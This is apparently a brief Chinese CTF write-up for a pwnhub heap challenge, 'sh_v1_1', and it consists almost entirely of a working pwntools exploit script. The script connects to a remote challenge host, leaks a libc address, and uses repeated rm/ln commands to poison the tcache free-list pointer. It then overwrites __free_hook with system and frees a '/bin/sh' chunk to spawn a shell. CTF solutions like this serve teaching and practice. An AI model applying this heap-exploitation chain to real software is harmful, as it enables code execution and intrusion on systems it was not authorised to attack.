pwnhub sh_v1_1
这题笔者操作了一会莫名其妙的就发现可以改fd了
操作过程在上面
rm 0,然后ln之后再rm 0再ln 过去的直接就可以改fd了,坑点就是远程libc是2.31的9版本,本地用的9.9打不通
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './sh_v1.1'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 1
if debug:
r = remote('121.40.89.206', 34883)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
def dbgg():
raw_input()
menu = '>>>>'
def touch(name, content):
r.sendlineafter(menu, 'touch ' + str(name))
r.sendline(content)
def rm(name):
r.sendlineafter(menu, 'rm ' + str(name))
def cat(name):
r.sendlineafter(menu, 'cat ' + str(name))
def edit(name, content):
r.sendlineafter(menu, 'gedit ' + str(name))
r.sendline(content)
def cp(name, name2):
r.sendlineafter(menu, 'cp ' + str(name) + ' ' + str(name2))
def ln(name, name2):
r.sendlineafter(menu, 'ln ' + str(name) + ' ' + str(name2))
dbgg()
for i in range(10):
touch(i, 'a' * 8)
for i in range(9):
rm(i)
for i in range(7):
touch(i, 'a' * 8)
touch(7, 'a' * 8)
cat(7)
leak_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('leak_addr = ' + hex(leak_addr))
#malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 1104 - 0x10
malloc_hook = leak_addr - 1104 - 0x10
li('malloc_hook = ' + hex(malloc_hook))
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('./libc-2.31.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
li('libc_base = ' + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))
#one = [0xe3afe, 0xe3b01, 0xe3b04]
one = [0x51e09, 0x51e15, 0x51e2a, 0x84143, 0x84150, 0x8415c, 0x84169, 0xe3afe, 0xe3b01, 0xe3b04, 0xe3cf3, 0xe3cf6, 0xe3d69, 0xe3d70, 0xe3db5, 0xe3dbd, 0x1075aa, 0x1075b2, 0x1075b7, 0x1075c1]
one_gadget = one[2] + libc_base
system_addr = libc_base + libc.sym['system']
edit(6, 'b' * 0x208)
rm(0)
ln(6, 0)
rm(0)
ln(6, 0)
edit(0, p64(free_hook))
touch(10, '/bin/sh\x00')
touch(11, p64(system_addr))
rm(10)
r.interactive()